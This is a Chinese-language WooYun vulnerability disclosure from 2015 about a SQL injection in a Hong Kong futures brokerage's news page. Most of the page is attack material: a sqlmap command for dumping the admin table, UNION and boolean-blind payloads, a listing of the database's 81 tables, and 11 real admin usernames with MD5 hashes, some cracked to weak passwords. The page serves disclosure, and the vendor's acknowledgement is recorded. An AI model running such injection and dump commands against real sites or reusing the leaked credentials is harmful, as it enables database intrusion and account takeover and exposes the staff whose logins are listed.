当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151169

漏洞标题:直達國際金融服務有限公司某處存在SQL插入攻擊(81個表/用戶名密碼泄露)(香港地區)

相关厂商:直達國際金融服務有限公司

漏洞作者: 路人甲

提交时间:2015-11-03 15:06

修复时间:2015-12-19 18:44

公开时间:2015-12-19 18:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

直达国际期货有限公司成立于2011年4月,总部位于香港。经香港证监会正式批准,依照相关法律和规定,经营香港地区及海外主要交易所的期货、期权等衍生产品之经纪业务。中央编号为AXH777。
上海直达软件公司是本公司的兄弟单位,拥有近20位专业软件工程师,搭建了覆盖中国境内、韩国、香港和美国的专线网络,提供全球化交易平台、结算系统、风险管理平台及程序化交易等产品,为公司客户提供稳定、快速的交易系统,为客户交易保驾护航。
2014年,直连美国芝加哥专线以及芝加哥COLO托管平台的搭建,则为公司高频交易客户创造了高速、低延迟的极速交易环境,极大的改善了内外盘套利基金及大型机构客户把握市场机会,力争毫秒领先优势。
公司自成立以来,一直用心倾听和满足客户需求,与客户建立长期合作伙伴关系,迅速获得客户认可,成交量快速提升,目前已经跃居香港中资期货公司前列,牢固确立了外盘期货行业新锐翘楚的地位。

详细说明:

地址:http://**.**.**.**/about/showNews.html?newsid=121

python sqlmap.py -u "http://**.**.**.**/about/showNews.html?newsid=121" -p newsid --technique=BTU --random-agent --batch -D directaccess_db -T manage_admin -C id,username,userpassword --dump

漏洞证明:

---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=121 AND 3774=3774
    Type: UNION query
    Title: MySQL UNION query (28) - 9 columns
    Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user:    'directaccess_ad@%'
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=121 AND 3774=3774
    Type: UNION query
    Title: MySQL UNION query (28) - 9 columns
    Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#
---
web application technology: Apache
back-end DBMS: MySQL 5
database management system users [1]:
[*] 'directaccess_ad'@'%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=121 AND 3774=3774
    Type: UNION query
    Title: MySQL UNION query (28) - 9 columns
    Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#
---
web application technology: Apache
back-end DBMS: MySQL 5
available databases [2]:
[*] directaccess_db
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=121 AND 3774=3774
    Type: UNION query
    Title: MySQL UNION query (28) - 9 columns
    Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: directaccess_db
[81 tables]
+---------------------------------+
| cfaq_category                   |
| cost_category                   |
| forexfaq_category               |
| manage_about                    |
| manage_admin                    |
| manage_admin_log                |
| manage_business                 |
| manage_calendar                 |
| manage_cfaq                     |
| manage_config                   |
| manage_cost                     |
| manage_exchange                 |
| manage_exchange1                |
| manage_forexfaq                 |
| manage_formdownload             |
| manage_good                     |
| manage_introduce                |
| manage_jobs                     |
| manage_kaihu                    |
| manage_link                     |
| manage_match                    |
| manage_newestmargin             |
| manage_news                     |
| manage_newsmatch                |
| manage_notice                   |
| manage_notice1                  |
| manage_other                    |
| manage_research                 |
| manage_sefaq                    |
| manage_sfaq                     |
| manage_share                    |
| manage_signup                   |
| manage_slider                   |
| manage_slider1                  |
| manage_software                 |
| manage_subscribe                |
| manage_trader                   |
| manage_trader1                  |
| manage_trader2                  |
| manage_trader3                  |
| manage_trader4                  |
| manage_trader5                  |
| manage_trader_1                 |
| manage_trader_2                 |
| manage_trading                  |
| manage_variety                  |
| manage_video                    |
| manage_videokaihu               |
| match_category                  |
| members                         |
| news_category                   |
| research_category               |
| sefaq_category                  |
| sfaq_category                   |
| share_category                  |
| variety_category                |
| video_category                  |
| zhida_assets                    |
| zhida_forex_ad                  |
| zhida_forex_bdxz                |
| zhida_forex_fgg_category        |
| zhida_forex_fyjgb_category      |
| zhida_forex_gonggao             |
| zhida_forex_yjbg                |
| zhida_forex_zn                  |
| zhida_fund                      |
| zhida_futures_ad                |
| zhida_futures_bdxz              |
| zhida_futures_fgg_category      |
| zhida_futures_fyjgb_category    |
| zhida_futures_gonggao           |
| zhida_futures_yjbg              |
| zhida_futures_zn                |
| zhida_home_ad                   |
| zhida_securities_ad             |
| zhida_securities_bdxz           |
| zhida_securities_fgg_category   |
| zhida_securities_fyjgb_category |
| zhida_securities_gonggao        |
| zhida_securities_yjbg           |
| zhida_securities_zn             |
+---------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=121 AND 3774=3774
    Type: UNION query
    Title: MySQL UNION query (28) - 9 columns
    Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: directaccess_db
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| content      | mediumtext   |
| id           | int(11)      |
| username     | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=121 AND 3774=3774
    Type: UNION query
    Title: MySQL UNION query (28) - 9 columns
    Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: directaccess_db
Table: manage_admin
[11 entries]
+------+-------------+-------------------------------------------+
| id   | username    | userpassword                              |
+------+-------------+-------------------------------------------+
| 1001 | admin       | 18ec31a168508eba89b55ca177c4d1e2          |
| 1000 | wp_leo      | 21232f297a57a5a743894a0e4a801fc3 (admin)  |
| 1028 | lifang      | 21218cca77804d2ba1922c33e0151105 (888888) |
| 1036 | zhouyanfang | c2362fc70cfb1868f6afcff87fa0f7f9          |
| 1032 | gaoling     | 21218cca77804d2ba1922c33e0151105 (888888) |
| 1033 | ruanjian    | 21218cca77804d2ba1922c33e0151105 (888888) |
| 1034 | dahk        | 21218cca77804d2ba1922c33e0151105 (888888) |
| 1035 | maomao      | f83f5591de546bcfd02befe73a1b79df          |
| 1037 | taozhaoyu   | a5929dc76f8e54bbaca8bcdb21eddc39          |
| 1038 | leo         | e10adc3949ba59abbe56e057f20f883e (123456) |
| 1039 | changyuqing | e10adc3949ba59abbe56e057f20f883e (123456) |
+------+-------------+-------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-04 18:42

厂商回复:

已將事件通知有關機構

最新状态:

暂无